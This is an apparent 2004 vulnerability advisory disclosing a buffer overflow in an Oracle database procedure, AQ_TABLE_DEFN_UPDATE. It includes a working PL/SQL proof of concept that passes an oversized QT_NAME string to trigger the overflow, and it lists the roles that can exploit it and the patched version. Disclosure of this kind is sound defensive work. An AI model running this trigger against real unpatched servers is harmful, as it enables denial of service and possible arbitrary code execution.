|
#27 - Buffer overflow in procedure AQ_TABLE_DEFN_UPDATE of DBMS_AQ_IMPORT_INTERNAL package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Medium
Details:
When AQ_TABLE_DEFN_UPDATE procedure is called with a long string in the QT_NAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE p_6_PRIMARY_INSTANCE BINARY_INTEGER;
p_7_SECONDARY_INSTANCE BINARY_INTEGER;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA;
AAA:=AAA || AAA || AAA;
SYS.DBMS_AQ_IMPORT_INTERNAL.AQ_TABLE_DEFN_UPDATE (QT_SCHEMA => 'SYS', QT_NAME => AAA, UDATA => 1, QT_FLAGS => 1, SORT_COLS => 1,
PRIMARY_INSTANCE => p_6_PRIMARY_INSTANCE, SECONDARY_INSTANCE => p_7_SECONDARY_INSTANCE, COMMENT => 'Y');
END;
Analysis:
This vulnerability can be exploited by members of any of the following roles EXECUTE_CATALOG_ROLE, EXP_FULL_DATABASE, EXP_FULL_DATABASE, AQ_ADMINISTRATOR_ROLE, SYSDBA roles and users granted execute permissions on DBMS_AQ_IMPORT_INTERNAL package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
|
